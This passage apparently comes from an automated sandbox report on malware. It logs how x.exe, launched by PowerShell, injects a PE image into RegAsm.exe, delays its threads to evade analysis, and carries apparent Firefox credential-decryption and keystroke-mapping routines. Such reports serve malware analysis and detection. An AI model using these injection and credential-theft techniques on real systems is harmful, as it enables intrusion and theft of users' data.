            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 594172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 593984
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 593744
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Thread delayed: delay time: 593609
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3402
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 514
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Window / User API: threadDelayed 2100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Window / User API: threadDelayed 7724
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Window / User API: foregroundWindowGot 1767
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8132; Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 8160; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep count: 37 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -34126476536362649s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7664; Thread sleep count: 2100 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -599890s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7664; Thread sleep count: 7724 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -599781s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -599671s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -599559s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -599444s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -599328s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -599217s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -599104s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -598787s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -598649s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -598530s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -598421s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -598312s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -598203s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -598093s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -597984s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -597871s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -597750s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -597640s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -597526s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -597406s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -597297s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -597184s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -597062s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -596953s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -596843s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -596734s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -596625s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -596515s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -596406s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -596297s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -596186s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -596078s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -595968s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -595859s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -595750s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -595640s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -595531s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -595421s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -595312s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -595203s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -595093s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -594984s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -594875s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -594759s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -594640s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -594526s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -594404s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -594294s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -594172s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -593984s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -593744s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660; Thread sleep time: -593609s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599559Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599444Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599217Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599104Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598787Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598649Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598530Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598421Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597871Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597750Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597526Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597184Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597062Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596843Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596186Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595421Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595093Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594875Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594759Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594526Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594404Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594294Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594172Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593744Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593609Jump to behavior
            Source: RegAsm.exe, 00000006.00000002.3754179576.0000000001472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0306C168 LdrInitializeThunk,LdrInitializeThunk,6_2_0306C168
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: 4.2.x.exe.2d0b410.2.raw.unpack, UltraSpeed.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
            Source: 4.2.x.exe.2d0b410.2.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
            Source: 4.2.x.exe.2d0b410.2.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
            Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
            Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 414000
            Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 416000
            Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1093008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qX&S
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qH('
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q|-W
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q4b0
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qd=p
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qXhH
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q\.G
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q0zA
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qxG%
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qT`;
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qpUs
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q44
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q$`h
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qx%t
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q,S,
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q,0i
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q8)8
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q|P7
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q`X\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qpz+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q$!@
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qDA;
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q\/P
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qLPd
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q0{J
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qlp_
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q<1.
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q {T
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q8Hl
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qXhg
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qlNy
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q|ok
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q<s/
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qh'5
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qL/Z
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q\Q)
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q8'b
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q<1%
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qXG]
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qPWv
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qhi,
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qd?F
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q(jK
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qXF5
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qp4J
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q8%N
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q(Fb
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q5\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q|,/
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q`4T
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q|LM
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q@vv
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qT^F
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qVf
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qlLW
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q8G'
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q|n&
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qh#K
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q@5D
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qxdZ
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q4<w
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qH%)
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qX#U
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q`x>
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qT?1
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q@79
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q(iB
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_qT_O
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q\,q
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR_q<-u
